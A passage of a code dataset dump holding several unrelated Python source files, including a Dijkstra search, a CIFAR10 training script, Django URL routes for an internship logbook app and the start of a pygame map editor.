'loan': loan.id\n }\n line = LoanLine.create([vals])\n\n\nclass LoanCancelreason(ModelSQL, ModelView):\n 'Loan Cancel Reason'\n\n __name__ = 'loan.cancel.reason'\n _rec_name = 'name'\n\n name = fields.Char(\"Cancel Reason\")\n\n\nclass loanLine(ModelSQL, ModelView):\n 'loan Lines'\n\n __name__ = 'loan.line'\n _rec_name = 'month'\n\n month = fields.Char(\"Month\")\n amount = fields.Float(\"Amount\")\n status = fields.Selection([\n ('pending', 'Pending'),\n ('done', 'Done'),\n ], string='Status',)\n loan = fields.Many2One(\"computer.loan\", \"Loan\")\n\n @staticmethod\n def default_status():\n return 'pending'\n","repo_name":"kakamble-aiims/work","sub_path":"src/modules/customised/payroll/loan/loan.py","file_name":"loan.py","file_ext":"py","file_size_in_byte":9520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26846572973","text":"import os\n\nimport h5py\nimport numpy as np\n\nfrom config import cfg\nfrom lib.dataset.utils import Splits\n\n\ndef save_feats():\n for split in [Splits.TRAIN,\n Splits.TEST,\n ]:\n\n pkls_dir = cfg.program.precomputed_data_dir_format % (cfg.model.rcnn_arch, split.value)\n os.makedirs(pkls_dir)\n precomputed_feats_fn = cfg.program.precomputed_feats_file_format % (cfg.model.rcnn_arch, split.value)\n feat_file = h5py.File(precomputed_feats_fn, 'r')\n try:\n box_feats = feat_file['box_feats']\n masks = feat_file['masks']\n chunk_size = 1000\n num_boxes = box_feats.shape[0]\n for i in range(np.ceil(num_boxes / chunk_size).astype(np.int)):\n start = i * chunk_size\n end = min((i + 1) * chunk_size, num_boxes)\n print(start, '-', end - 1)\n box_feats_chunk = box_feats[start:end, :]\n masks_chunk = masks[start:end, :]\n with open(os.path.join(pkls_dir, 'box_%d-%d.pkl' % (start, end - 1)), 'wb') as f:\n np.savez(f, box_feats=box_feats_chunk, masks=masks_chunk)\n finally:\n feat_file.close()\n print('%s feat file closed.' % split.value)\n\n\nif __name__ == '__main__':\n save_feats()\n","repo_name":"alessiosarullo/KBVRD","sub_path":"dump/h5_to_pkls.py","file_name":"h5_to_pkls.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26534957989","text":"class Solution:\n def combinationSum2(self, candidates: List[int], target: int) -> List[List[int]]:\n candidates.sort()\n dp = [[] for _ in range(0, target+1)]\n dp[0].append([])\n for n in candidates:\n for t in range(target, n-1, -1):\n if n <= t:\n for j in dp[t-n]:\n if j + [n] not in dp[t]:\n dp[t].append(j + [n])\n return dp[target]","repo_name":"cli3338198/leetcode","sub_path":"0040-combination-sum-ii/0040-combination-sum-ii.py","file_name":"0040-combination-sum-ii.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"22505824740","text":"# https://www.acmicpc.net/problem/2108\n\n\"\"\"\n각각의 지표들을 구하는 함수를 만들어주고, 차례대로 출력해준다.\n\n산술평균 : N개의 수들의 합을 N으로 나눈 값\n중앙값 : N개의 수들을 증가하는 순서로 나열했을 경우 그 중앙에 위치하는 값\n최빈값 : N개의 수들 중 가장 많이 나타나는 값\n범위 : N개의 수들 중 최댓값과 최솟값의 차이\n\"\"\"\n\nimport sys \nfrom collections import Counter\n\nt = int(sys.stdin.readline())\n\nnumbers = [int(sys.stdin.readline()) for _ in range(t)]\n \ndef mean(nums):\n return round(sum(nums)/len(nums))\n\ndef median(nums):\n nums.sort()\n mid = nums[len(nums)//2] # nums의 개수는 홀수\n \n return mid\n\ndef mode(nums):\n mode_dict = Counter(nums)\n modes = mode_dict.most_common() \n \n if len(nums) > 1 : \n if modes[0][1] == modes[1][1]:\n mod = modes[1][0]\n else : \n mod = modes[0][0]\n else : \n mod = modes[0][0]\n\n return mod\n \ndef range(nums):\n return max(nums) - min(nums)\n\nprint(mean(numbers))\nprint(median(numbers))\nprint(mode(numbers))\nprint(range(numbers))\n","repo_name":"sophryu99/algorithm","sub_path":"BaekJoon/2108_통계학.py","file_name":"2108_통계학.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"2914858709","text":"import json\n\n\ndef paginate_dataset(dataset, page, page_size):\n \"\"\"Paginate a dataset in a deletion-resilient manner.\n\n Args:\n dataset: The dataset to paginate.\n page: The current page number.\n page_size: The number of items per page.\n\n Returns:\n A dictionary containing the paginated dataset and hypermedia metadata.\n \"\"\"\n\n tombstones = []\n\n for item in dataset:\n if item['deleted']:\n tombstones.append(item['id'])\n\n paginated_dataset = [\n item for item in dataset if item['id'] not in tombstones\n ][(page - 1) * page_size:page * page_size]\n\n metadata = {\n \"page\": page,\n \"page_size\": page_size,\n \"total_pages\": len(dataset) - len(tombstones) // page_size + 1,\n }\n\n if page > 1:\n metadata[\"previous_page\"] = page - 1\n\n if page < metadata[\"total_pages\"]:\n metadata[\"next_page\"] = page + 1\n\n return {\"data\": paginated_dataset, \"meta\": metadata}\n\n\ndef main():\n dataset = [\n {'id': 1, 'deleted': True},\n {'id': 2, 'deleted': True},\n {'id': 3, 'deleted': True},\n {'id': 4, 'deleted': True},\n {'id': 5, 'deleted': False},\n ]\n\n paginated_dataset = paginate_dataset(dataset, 1, 2)\n\n print(json.dumps(paginated_dataset, indent=2))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AishaKhalfan/alx-backend","sub_path":"0x00-pagination/deletion-resilient.py","file_name":"deletion-resilient.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4065966272","text":"'''\n188 Best Time to Buy and Sell Stock IV\n\nYou are given an integer array prices where prices[i] is the price of a given stock on the ith day, and an integer k.\n\nFind the maximum profit you can achieve. You may complete at most k transactions.\n\nNote: You may not engage in multiple transactions simultaneously (i.e., you must sell the stock before you buy again).\n\n \n\nExample 1:\n\nInput: k = 2, prices = [2,4,1]\nOutput: 2\nExplanation: Buy on day 1 (price = 2) and sell on day 2 (price = 4), profit = 4-2 = 2.\nExample 2:\n\nInput: k = 2, prices = [3,2,6,5,0,3]\nOutput: 7\nExplanation: Buy on day 2 (price = 2) and sell on day 3 (price = 6), profit = 6-2 = 4. Then buy on day 5 (price = 0) and sell on day 6 (price = 3), profit = 3-0 = 3.\n \n\nConstraints:\n\n1 <= k <= 100\n1 <= prices.length <= 1000\n0 <= prices[i] <= 1000\n\n'''\n\nclass Solution:\n def maxProfit(self, k: int, prices: List[int]) -> int:\n if k >= len(prices) // 2:\n sell = 0\n hold = -math.inf\n\n for price in prices:\n sell = max(sell, hold + price)\n hold = max(hold, sell - price)\n\n return sell\n\n sell = [0] * (k + 1)\n hold = [-math.inf] * (k + 1)\n\n for price in prices:\n for i in range(k, 0, -1):\n sell[i] = max(sell[i], hold[i] + price)\n hold[i] = max(hold[i], sell[i - 1] - price)\n\n return sell[k]\n","repo_name":"codnegaar/Leetcode_Challeng","sub_path":"Leetcode 188 Best Time to Buy and Sell Stock IV.py","file_name":"Leetcode 188 Best Time to Buy and Sell Stock IV.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"2443234457","text":"import sys\nfrom heapq import heappush, heappop\n\n\nclass Graph():\n def __init__(self):\n # graph structure is {\n # Node:\n # incoming: [(length, source), ...]\n # outgoing: [(length, target), ...]\n # greedy_score: 1000000\n # }\n self.graph = {}\n\n self.nodes_captured = None # keep track of nodes already seen (in X)\n self.target_nodes = None # keep track of nodes accessible from X\n\n def _add_new_node(self, node, incoming, outgoing, greedy_score=1000000):\n self.graph[node] = {\n 'incoming': incoming,\n 'outgoing': outgoing,\n 'greedy_score': greedy_score\n }\n def add_node(self, line):\n '''parse line from input and insert node information into graph'''\n line = line.split('\\t')\n source = int(line[0])\n\n for pair_string in line[1:-1]:\n target, length = [int(val) for val in pair_string.split(',')]\n\n if source in self.graph:\n self.graph[source]['outgoing'].append((length, target))\n else:\n self._add_new_node(source, [], [(length, target)])\n\n if target in self.graph:\n self.graph[target]['incoming'].append((length, source))\n else:\n self._add_new_node(target, [(length, target)], [])\n\n # print(self.graph)\n\n def build_graph(self, f):\n '''parse file and add nodes to graph'''\n for line in f.readlines():\n self.add_node(line)\n\n def _further_frontier(self):\n '''move the frontier one node further'''\n next_target = self._get_next_target()\n if not next_target: return None\n self._migrate_node(next_target)\n\n def _get_next_target(self):\n '''figure out which node to migrate next'''\n score, next_target = heappop(self.target_nodes)\n\n while next_target in self.nodes_captured:\n if self.target_nodes:\n score, next_target = heappop(self.target_nodes)\n else:\n return None\n\n return next_target\n\n def _migrate_node(self, node):\n '''migrate input node and clean up graph to\n maintain dijkstras invariants\n '''\n # bookkeeping for node migration\n self.nodes_captured.add(node)\n self.nodes_to_find.discard(node)\n node_greedy_score = self.graph[node]['greedy_score']\n\n # graph cleanup after node migration.\n for length, target in self.graph[node]['outgoing']:\n if target not in self.nodes_captured:\n self.graph[target]['greedy_score'] = min(\n self.graph[target]['greedy_score'],\n node_greedy_score + length\n )\n\n heappush(\n self.target_nodes,\n (self.graph[target]['greedy_score'], target)\n )\n\n def search_until_satisfied(self, source, nodes_to_find):\n '''Expand graph frontier until all nodes of interest are found\n or the entire graph connected to the source input is exhausted\n '''\n self.nodes_to_find = set(nodes_to_find)\n self.graph[source]['greedy_score'] = 0\n self.nodes_captured = set()\n self.target_nodes = []\n\n self._migrate_node(source)\n\n while self.target_nodes and self.nodes_to_find:\n self._further_frontier()\n\n print('frontier exhausted or all nodes found')\n print('Target nodes not found:')\n if self.nodes_to_find:\n for node in self.nodes_to_find:\n print(node)\n else:\n print('None')\n\n print('Nodes found:')\n for node in nodes_to_find:\n print('{}:\\t{}'.format(node, self.graph[node]['greedy_score']))\n\n\nif __name__ == '__main__':\n g = Graph()\n\n filename = sys.argv[1]\n\n with open(filename) as f:\n g.build_graph(f)\n\n g.search_until_satisfied(1, [7, 37, 59, 82, 99, 115, 133, 165, 188, 197])\n","repo_name":"rsenseman/Algorithms-Stanford","sub_path":"Programming Assignment 5/dijkstras.py","file_name":"dijkstras.py","file_ext":"py","file_size_in_byte":4015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"44334330149","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom nolds import corr_dim, hurst_rs, sampen\r\n\r\n\r\ndef fractal_dimension(X):\r\n # podział sygnału na przedziały o równej długości\r\n n = 10\r\n X_min = np.min(X)\r\n X_max = np.max(X)\r\n delta_X = (X_max - X_min) / n\r\n\r\n # policzenie liczby pudełek potrzebnych do pokrycia każdego przedziału\r\n counts = np.zeros(n)\r\n for i in range(n):\r\n box_min = X_min + i * delta_X\r\n box_max = X_min + (i + 1) * delta_X\r\n counts[i] = np.sum((X >= box_min) & (X <= box_max))\r\n\r\n # policzenie liczby pudełek potrzebnych do pokrycia całego sygnału dla każdego rozmiaru pudełka\r\n box_sizes = np.power(2, np.arange(1, np.floor(np.log2(n)) + 1))\r\n N = np.zeros_like(box_sizes)\r\n for i, size in enumerate(box_sizes):\r\n n_boxes = int(np.floor(n / size))\r\n if n_boxes == 0:\r\n break\r\n Xb = counts[:int(n_boxes * size)]\r\n Xb = np.reshape(Xb, (n_boxes, int(size)))\r\n N[i] = np.sum(np.sum(Xb, axis=1) > 0)\r\n\r\n # dopasowanie prostej\r\n coeff = np.polyfit(np.log(box_sizes[:i]), np.log(N[:i]), 1)\r\n D = coeff\r\n\r\n return D\r\n\r\n\r\nt = pd.date_range(start='2021-01-01', end='2021-03-17', freq='H')\r\n#x = np.round(np.cumsum(np.random.normal(0, 1, size=(t.size)), axis=0), 2)\r\nx = np.round(np.random.normal(0, 1, size=(t.size)), 2)\r\ndf = pd.DataFrame(x, index=t, columns=['x'])\r\n\r\n# entropia\r\nentropia = -np.sum(df['x'] * np.log2(df['x']))\r\nprint(f'entropia = {entropia}')\r\n\r\n# entropia z biblioteki nolds\r\nentropia_nolds = sampen(df['x'].values)\r\nprint(f'entropia z nolds = {entropia_nolds}')\r\n\r\n# wykładnik Hursta\r\nH = hurst_rs(df['x'].values)\r\nprint(f'wykładnik Hursta = {H}')\r\n\r\n# wymiar fraktalny\r\n# https://en.wikipedia.org/wiki/Fractal_dimension\r\nD = fractal_dimension(df['x'].values)\r\nprint(f'wymiar fraktalny = {-D[0]}')\r\n\r\n# wymiar fraktalny z biblioteki nolds\r\nD_nolds = corr_dim(df['x'].values, 10)\r\nprint(f'wymiar fraktalny z nolds = {D_nolds}')\r\n\r\n\r\nwith plt.style.context('seaborn'):\r\n fig, ax = plt.subplots()\r\n df.plot(ax=ax)\r\nplt.show()\r\n","repo_name":"szadamek/Big-Data-and-Machine-Learning","sub_path":"time_series/fractal_dim_and_hurst_exp.py","file_name":"fractal_dim_and_hurst_exp.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1832316773","text":"''' Trains a (pre trained) network with additional dropout layers for uncertainty estimation'''\r\n\r\n#https://stackoverflow.com/questions/49646304/keras-optimizing-two-outputs-with-a-custom-loss\r\n# https://stackoverflow.com/questions/46663013/what-is-y-true-and-y-pred-when-creating-a-custom-metric-in-keras\r\n# https://towardsdatascience.com/advanced-keras-constructing-complex-custom-losses-and-metrics-c07ca130a618\r\n\r\nimport os\r\nimport datetime\r\nimport time\r\nimport random\r\nimport h5py\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport matplotlib as mpl\r\nmpl.use('Agg')\r\nimport matplotlib.pyplot as plt\r\nplt.style.use(\"ggplot\")\r\n\r\nfrom tensorflow.keras.models import Model, load_model\r\nfrom tensorflow.keras.layers import Input, Dense, BatchNormalization, Flatten, concatenate\r\nfrom tensorflow.keras import optimizers\r\nfrom tensorflow.keras.applications.vgg16 import VGG16\r\nfrom tensorflow.keras.datasets import cifar10\r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\nfrom sklearn.metrics import accuracy_score\r\n\r\nfrom tensorflow.keras import Input, layers, models, utils\r\nfrom tensorflow.keras import backend as K\r\n\r\nfrom uncertainty_output import Uncertainty_output\r\n\r\n# from customLoss import CategoricalVariance\r\n\r\nWEIGHTS_PATH = ('https://github.com/fchollet/deep-learning-models/'\r\n 'releases/download/v0.1/'\r\n 'vgg16_weights_tf_dim_ordering_tf_kernels.h5')\r\nWEIGHTS_PATH_NO_TOP = ('https://github.com/fchollet/deep-learning-models/'\r\n 'releases/download/v0.1/'\r\n 'vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5')\r\n\r\n# Input image dimensions\r\nIMG_HEIGHT, IMG_WIDTH, IMG_DEPTH = 32, 32, 3\r\nDATASET_NAME = os.path.sep + 'CIFAR10'\r\n\r\nBATCH_SIZE = 128\r\nNUM_CLASSES = 10\r\nEPOCHS_1 = 150\r\nES_PATIENCE_1 = 10\r\nEPOCHS_2 = 30\r\nES_PATIENCE_2 = 10\r\nEPOCHS_3 = 5\r\nES_PATIENCE_3 = 2\r\n\r\nTEST_BATCH_SIZE = 250\r\nTRAIN_TEST_SPLIT = 0.8 # Value between 0 and 1, e.g. 0.8 creates 80%/20% division train/test\r\nTRAIN_VAL_SPLIT = 0.875\r\n\r\nTRAIN_ALL_LAYERS = True\r\nWEIGHTS_TO_USE = 'imagenet'\r\nLEARN_RATE = 0.00001\r\n\r\n\r\n# Get dataset path\r\nDIR_PATH_HEAD_TAIL = os.path.split(os.path.dirname(os.path.realpath(__file__)))\r\nROOT_PATH = DIR_PATH_HEAD_TAIL[0]\r\nDATA_PATH = ROOT_PATH + os.path.sep + 'Datasets' + DATASET_NAME\r\n\r\n\r\ndef prepare_data():\r\n ''' Load the data and perform shuffle/augmentations if needed '''\r\n # Split the data between train and test sets\r\n (x_train, y_train), (x_test, y_test) = cifar10.load_data()\r\n\r\n # For evaluation, this image is put in the fig_dir created above\r\n test_img_idx = random.randint(0, len(x_test) - 1)\r\n\r\n print(\"\"\"dataset_name = {}, batch_size = {}, num_classes = {}, epochs_1 = {},\r\n epochts_2 = {}, test_img_idx = {},\r\n train_test_split = {}\r\n learn rate = {},\r\n train_all_layers = {}, weights_to_use = {},\r\n es_patience_1 = {}, es_patience_2 = {}, train_val_split = {}\"\"\".format(\r\n DATASET_NAME, BATCH_SIZE, NUM_CLASSES, EPOCHS_1,\r\n EPOCHS_2, test_img_idx,\r\n TRAIN_TEST_SPLIT,\r\n LEARN_RATE,\r\n TRAIN_ALL_LAYERS, WEIGHTS_TO_USE,\r\n ES_PATIENCE_1, ES_PATIENCE_2, TRAIN_VAL_SPLIT))\r\n\r\n x_train = np.asarray(x_train)\r\n y_train = np.asarray(y_train)\r\n x_test = np.asarray(x_test)\r\n y_test = np.asarray(y_test)\r\n\r\n print('x_train shape:', x_train.shape)\r\n print(x_train.shape[0], 'train samples')\r\n print(x_test.shape[0], 'test samples')\r\n\r\n # convert class vectors to binary class matrices\r\n y_train = tf.keras.utils.to_categorical(y_train, NUM_CLASSES*2)\r\n y_test = tf.keras.utils.to_categorical(y_test, NUM_CLASSES*2)\r\n\r\n return(x_train, y_train, x_test, y_test, test_img_idx)\r\n\r\n\r\ndef main():\r\n ''' Main function '''\r\n # Load data\r\n x_train, y_train, x_test, y_test, test_img_idx = prepare_data()\r\n\r\n x_test, x_val = np.split(x_test, [int(TRAIN_VAL_SPLIT*len(x_test))])\r\n y_test, y_val = np.split(y_test, [int(TRAIN_VAL_SPLIT*len(y_test))])\r\n\r\n label_count = [0] * NUM_CLASSES\r\n for lab in y_train:\r\n label_count[np.argmax(lab)] += 1\r\n print(\"Total labels in train set: \", label_count) \r\n\r\n label_count = [0] * NUM_CLASSES\r\n for lab in y_val:\r\n label_count[np.argmax(lab)] += 1\r\n print(\"Labels in validation set: \", label_count) \r\n \r\n label_count = [0] * NUM_CLASSES\r\n for lab in y_test:\r\n label_count[np.argmax(lab)] += 1\r\n print(\"Labels in test set: \", label_count) \r\n\r\n # VGG16 since it does not include batch normalization of dropout by itself\r\n Error_model = VGG16(weights=WEIGHTS_TO_USE, include_top=False,\r\n input_shape=(IMG_HEIGHT, IMG_WIDTH, IMG_DEPTH),\r\n classes=NUM_CLASSES)\r\n\r\n # Stacking a new simple convolutional network on top of vgg16\r\n all_layers = [l for l in Error_model.layers]\r\n x = all_layers[0].output\r\n for i in range(1, len(all_layers)):\r\n x = all_layers[i](x)\r\n\r\n # Classification block\r\n x = Flatten(name='flatten')(x)\r\n x = Dense(4096, activation='relu', name='fc1')(x)\r\n last_layer_1 = Dense(4096, activation='relu', name='fc2_1')(x)\r\n last_layer_2 = Dense(4096, activation='relu', name='fc2_2')(x)\r\n classification = Dense(NUM_CLASSES, activation='softmax')(last_layer_1)\r\n Error = Dense(NUM_CLASSES, activation='linear')(last_layer_2)\r\n\r\n out = concatenate([classification, Error])\r\n\r\n # Creating new model\r\n Error_model = Model(inputs=all_layers[0].input, outputs=out)\r\n\r\n Error_model.summary()\r\n\r\n adam = optimizers.Adam(lr=LEARN_RATE)\r\n # sgd = optimizers.SGD(lr=LEARN_RATE)\r\n\r\n Error_model.compile(\r\n optimizer=adam,\r\n loss=Uncertainty_output(NUM_CLASSES).error,\r\n metrics=['acc']\r\n )\r\n\r\n print(\"Start fitting\")\r\n \r\n # Dir to store created figures\r\n fig_dir = os.path.join(os.getcwd(), \"CIFAR10\" + os.path.sep + datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S'))\r\n os.makedirs(fig_dir)\r\n # Dir to store Tensorboard data\r\n log_dir = os.path.join(fig_dir, \"logs\" + os.path.sep + \"fit\" + os.path.sep + datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\"))\r\n os.makedirs(log_dir)\r\n\r\n os.chdir(fig_dir)\r\n\r\n mc_1 = tf.keras.callbacks.ModelCheckpoint('best_model.h5', monitor='loss', mode='min', save_best_only=True)\r\n tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir)\r\n early_stopping_1 = tf.keras.callbacks.EarlyStopping(monitor='loss',\r\n mode='auto', verbose=1, patience=ES_PATIENCE_1)\r\n\r\n\r\n datagen = ImageDataGenerator(rescale=1./255, dtype='ndarray')\r\n train_generator = datagen.flow(x_train,\r\n y_train,\r\n batch_size=BATCH_SIZE)\r\n \r\n val_generator = datagen.flow(x_val,\r\n y_val,\r\n batch_size=BATCH_SIZE)\r\n\r\n\r\n\r\n Error_model.fit(train_generator,\r\n epochs=EPOCHS_1,\r\n verbose=2,\r\n validation_data=val_generator,\r\n callbacks=[tensorboard_callback, early_stopping_1, mc_1])\r\n\r\n Error_model = load_model('best_model.h5', compile = False)\r\n os.remove('best_model.h5')\r\n\r\n Error_model.compile(\r\n optimizer=adam,\r\n loss=Uncertainty_output(NUM_CLASSES).categorical_cross,\r\n metrics=['acc']\r\n )\r\n\r\n mc_2 = tf.keras.callbacks.ModelCheckpoint('best_model.h5', monitor='val_loss', mode='min', save_best_only=True)\r\n early_stopping_2 = tf.keras.callbacks.EarlyStopping(monitor='val_loss',\r\n mode='auto', verbose=1, patience=ES_PATIENCE_2)\r\n\r\n Error_model.fit(train_generator,\r\n epochs=EPOCHS_2,\r\n verbose=2,\r\n validation_data=val_generator,\r\n callbacks=[tensorboard_callback, early_stopping_2, mc_2])\r\n\r\n Error_model = load_model('best_model.h5', compile = False)\r\n os.remove('best_model.h5')\r\n\r\n Error_model.compile(\r\n optimizer=adam,\r\n loss=Uncertainty_output(NUM_CLASSES).categorical_error,\r\n metrics=['acc']\r\n )\r\n\r\n mc_3 = tf.keras.callbacks.ModelCheckpoint('best_model.h5', monitor='loss', mode='min', save_best_only=True) \r\n early_stopping_3 = tf.keras.callbacks.EarlyStopping(monitor='loss',\r\n mode='auto', verbose=1, patience=ES_PATIENCE_2)\r\n\r\n Error_model.fit(train_generator,\r\n epochs=EPOCHS_2,\r\n verbose=2,\r\n validation_data=val_generator,\r\n callbacks=[tensorboard_callback, early_stopping_2, mc_3])\r\n\r\n Error_model = load_model('best_model.h5', compile = False)\r\n os.remove('best_model.h5')\r\n\r\n # Save JSON config to disk\r\n json_config = Error_model.to_json()\r\n with open('Error_model_config.json', 'w') as json_file:\r\n json_file.write(json_config)\r\n # Save weights to disk\r\n Error_model.save_weights('Error_weights.h5')\r\n\r\n Error_predictions = Error_model.predict(x_test)\r\n Uncertainty_output(NUM_CLASSES).results_if_label(Error_predictions, y_test, scatter=True, name='CIFAR10_No_Conv')\r\n\r\n Error_predictions = Uncertainty_output(NUM_CLASSES).convert_output_to_uncertainty(Error_predictions)\r\n Uncertainty_output(NUM_CLASSES).results_if_label(Error_predictions, y_test, scatter=True, name='CIFAR10')\r\n\r\n\r\n single_acc = accuracy_score(y_test.argmax(axis=1), Error_predictions[:, :NUM_CLASSES].argmax(axis=1))\r\n print(single_acc)\r\n dir_path_head_tail = os.path.split(os.path.dirname(os.getcwd()))\r\n if WEIGHTS_TO_USE != None:\r\n new_path = dir_path_head_tail[0] + os.path.sep + 'CIFAR10' + os.path.sep + datetime.datetime.now().strftime('%Y-%m-%d_%H-%M') + '_' + WEIGHTS_TO_USE + '_' + str(BATCH_SIZE) + 'B' + '_{:.1%}A'.format(single_acc)\r\n else:\r\n new_path = dir_path_head_tail[0] + os.path.sep + 'CIFAR10' + os.path.sep + datetime.datetime.now().strftime('%Y-%m-%d_%H-%M') + '_' + str(BATCH_SIZE) + 'B' + '_{:.1%}A'.format(single_acc)\r\n os.rename(fig_dir, new_path)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Flokman/MasterThesis","sub_path":"VarianceOutput/CIFAR10_VarianceOutput.py","file_name":"CIFAR10_VarianceOutput.py","file_ext":"py","file_size_in_byte":10284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26901672241","text":"__author__ = 'cjoakim'\n\nimport math\n\nfrom .elapsed_time import ElapsedTime\n\n\nclass Speed(object):\n\n def __init__(self, d, et):\n self.dist = d # an instance of Distance\n self.etime = et # an instance of ElapsedTime\n\n def mph(self):\n return self.dist.as_miles() / self.etime.hours()\n\n def kph(self):\n return self.dist.as_kilometers() / self.etime.hours()\n\n def yph(self):\n return self.dist.as_yards() / self.etime.hours()\n\n def pace_per_mile(self):\n spm = self.seconds_per_mile()\n mm = math.floor(spm / 60.0)\n ss = spm - (mm * 60.0)\n\n if ss < 10:\n ss = \"0{0}\".format(ss)\n else:\n ss = \"{0}\".format(ss)\n\n if len(ss) > 5:\n ss = ss[0:5]\n\n return \"{0}:{1}\".format(mm, ss)\n\n def seconds_per_mile(self):\n return float(self.etime.secs / self.dist.as_miles())\n\n def projected_time(self, another_distance, algorithm='simple'):\n if algorithm is 'riegel':\n t1 = float(self.etime.secs)\n d1 = self.dist.as_miles()\n d2 = another_distance.as_miles()\n t2 = t1 * math.pow(float(d2 / d1), float(1.06))\n et = ElapsedTime(t2)\n return et.as_hhmmss()\n else:\n secs = float(self.seconds_per_mile() * another_distance.as_miles())\n et = ElapsedTime(secs)\n return et.as_hhmmss()\n\n def age_graded(self, event_age, graded_age):\n ag_factor = event_age.max_pulse() / graded_age.max_pulse()\n graded_secs = float((self.etime.secs)) * float(ag_factor)\n graded_et = ElapsedTime(graded_secs)\n return Speed(self.dist, graded_et)\n\n def __str__(self):\n template = \"\"\n return template.format(self.dist, self.etime)\n","repo_name":"cjoakim/oss","sub_path":"m26-py/m26/speed.py","file_name":"speed.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"16604058891","text":"from django.urls import path\nfrom django.conf.urls import url, include\nfrom .import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n #login and register urls\n path('',views.lindex,name='index'),\n path('login/',views.login_view, name='login_view'),\n path('register/',views.register, name='register'),\n path('logout/', views.logout_user, name=\"logout\"),\n # path('adminpage/', views.hod, name='adminpage'),\n \n #lecturer urls\n path('lecturer_page/',views.lecturer,name='lecturer'),\n path('viewstudent/',views.viewallstudent,name='allstudent'),\n # path('viewAssessment/',views.viewallassess,name='viewallAssessment'),\n # path('viewsupervisorassess/',views.supervisorassessment,name='viewall'),\n path('lectass/',views.lecturerassement,name='viewall'),\n path('viewcompanydetails/',views.viewCompanydetails,name='allcompanydetails'),\n path('editview/', views.getAssess),\n path('logbookdetails/',views.logbookdetails,name='logbookdetails'),\n path('viewlog/',views.logbookview),\n path('reportview/',views.reportview,name='reportviews'),\n path('assessed/',views.showassessed,name='assessed'),\n path('lecassess/', views.LecAssess), \n path('lecupdate/', views.LecUpdate), \n path('assessview/',views.viewassess),\n\n\n\n\n\n #students url\n # path('add',views.add),\n path('companydetails/',views.compdet,name='companydetails'),\n path('student/',views.student,name='student'),\n path('student_det/',views.addStudent,name='new_student'),\n path('elogbook/',views.elogbook,name='logbook'),\n path('new_entry',views.elogbook_entry,name='elogbook'),\n path('view/',views.ViewStudent,name='viewstudent'),\n path('up/',views.model_form_upload,name='report'),\n path('view_report/',views.report,name='view_report'), \n path('company/',views.addCompany,name='companyde'),\n path('viewCompany/',views.viewCompany,name='ViewCompany'), \n path('editcompany/',views.editcompany),\n path('updatecompany/',views.updatecompany),\n\n\n\n #suprvisor urls\n # path('',views.student),\n path('viewlogbook/',views.Logbook,name=\"viewlogbooks\"),\n path('log/',views.ViewLogbook),\n path('assessment/',views.viewassessment,name='assess'),\n path('assess/',views.view,name=\"viewassess\"),\n path('supervisor_page/',views.supervisor,name='supervisors'),\n path('studentdetails', views.index,name='details'), \n path('edit/', views.edit), \n path('update/', views.update), \n # path('delete/', views.destroy), \n\n\n]\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"ericdev-202/ibms","sub_path":"attach/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15032741118","text":"import pygame as pg\nimport sys\nimport time\nfrom const import COLOURS\nfrom mouse import Mouse\nfrom keyboard import EditorKeyboardData\nfrom font import PxFont\nfrom toolbar import EditorToolbar\nfrom asset_manager import EditorAssetManager\nfrom map_manager import EditorMapManager\n\n\nclass PgEditor:\n def __init__(self, screen_size=(1280, 720), canvas_size=(640, 360)) -> None:\n pg.init()\n pg.event.set_allowed([pg.QUIT, pg.KEYDOWN, pg.KEYUP, pg.MOUSEBUTTONDOWN, pg.MOUSEBUTTONUP])\n pg.display.set_caption(\"Pygame 2D Pixel Art Map Editor\")\n self.screen_size = screen_size\n self.screen = pg.display.set_mode(screen_size)\n self.canvas_size = canvas_size\n self.canvas = pg.Surface(canvas_size).convert()\n self.ratio = (self.screen_size[0]/self.canvas_size[0], self.screen_size[1]/self.canvas_size[1])\n self.running = 1\n \n self.fps = 60\n self.clock = pg.time.Clock()\n\n self.mouse = Mouse()\n self.keyboard = EditorKeyboardData()\n \n self.font = PxFont()\n\n self.toolbar_w = self.canvas_size[0]\n self.toolbar_h = self.canvas_size[1]/15\n self.toolbar_size = (self.toolbar_w, self.toolbar_h)\n self.toolbar = EditorToolbar(self.toolbar_size, self.font)\n\n self.asset_manager_w = self.canvas_size[0]/5\n self.asset_manager_h = self.canvas_size[1]-self.toolbar_h\n self.asset_manager_size = (self.asset_manager_w, self.asset_manager_h)\n 